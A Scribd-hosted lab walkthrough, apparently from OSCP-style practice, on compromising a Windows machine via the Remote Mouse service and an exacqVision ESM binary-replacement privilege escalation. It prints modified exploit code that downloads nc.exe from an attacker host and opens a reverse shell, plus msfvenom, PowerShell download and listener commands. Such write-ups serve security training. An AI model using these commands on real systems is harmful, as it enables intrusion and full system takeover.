Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd Logo
Upload

Welcome to Scribd!

  • 89 - Esm

    Uploaded by

    qzombexzombe114
    33 views10 pages
    The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

    Original Description:

    Original Title

    89_-_ESM

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    33 views10 pages

    89 - Esm

    Uploaded by

    qzombexzombe114
    The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 10

    89 ESM Writeup

    1 | Page
    .89 Machine

    Open ports

    21 ..... file zilla


    80 ....... apache exacq esm
    135
    139
    445
    1978 remoutemouse
    1979
    1980
    8090 ....... apache 2.4.43 ... /project/

    21: can connect anonymously


    There is project.zip you can download

    Zip file contains:

    .editorconfig

    On 8090

    With that name of the zip file

    192.168.xx.89:8090/project/
    Tried to enum
    Found a laravel app

    Folders:

    2 | Page
    .env file contains a app key
    (Tried msf and decrypting .env or exploiting it with .env key but not work)

    Also on

    /storage/framwork/sessions/
    Found sessions

    But that is useless.

    We noticed that 1978 port is open. We googled it and we found that port is for remotemouse

    https://wintelguy.com/port-search/1978

    Or simply

    Nmap 192.168.xx.89 -p1978 -nv

    the response is SIN 15win nop nop 300

    3 | Page
    We found the exploit for the remoutemouse

    https://www.exploit-db.com/exploits/46697

    But it need some modifications to work properly

    The modified part by adding one liner powershell reverse_shell

    Ref:

    https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/

    4 | Page
    5 | Page
    Add the ip and port

    Open terminal

    Nc -lnvp 445

    Run the exploit

    Then you are user.

    Alternative: you can also do it with nc.exe

    (GOLDEN)

    First upload ncat

    def PopCalc(ip):
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(2)
    SendString('''powershell''',ip)
    sleep(3)
    SendString("\n",ip)
    sleep(5)
    SendString('''Invoke-WebRequest -Uri 'http://192.168.101.13/nc.exe' -OutFile
    C:\Users\Public\nc.exe ''',ip)
    6 | Page
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    print("SUCCESS! Process calc.exe has run on target",ip)

    Then edit again the exploit with:

    def PopCalc(ip):
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(1)
    SendString('''cmd.exe''',ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    SendString(“C:\Users\Public\nc.exe 192.168.101.13 1212 -e cmd.exe",ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    print("SUCCESS! Process calc.exe has run on target",ip)

    Or

    7 | Page
    Privesc:

    Enumerating reveals the vulnerable services

    Exacqvision ESM is likely vilnerable

    Which is on port 8090

    We found the version on login form

    exacqVision ESM 5.12.2

    8 | Page
    We found the privesc exploit

    9 | Page
    1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe >
    /var/www/html/enterprisesystemmanager.exe

    2. Setup listener and ensure apache is running on attacking machine


    nc -nlvvp 443
    service apache2 start

    3. Download malicious .exe on victim machine


    Powershell invoke-WebRequest -Uri 'http://192.168.101.13/enterprisesystemmanager.exe’ -OutFile C:\Users\Public\
    enterprisesystemmanager.exe

    4. Rename C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe
    enterprisesystemmanager.exe > enterprisesystemmanager.bak

    5. Copy/Move downloaded enterprisesystemmanager.exe file to


    C:\exacqVisionEsm\EnterpriseSystemManager\

    6. Restart victim machine


    Shutdown /r

    and setup a listener `nc -nvlp 80’

    7. Reverse Shell on attacking machine opens


    C:\Windows\system32>whoami
    whoami
    nt authority\system

    10 | Page

    You might also like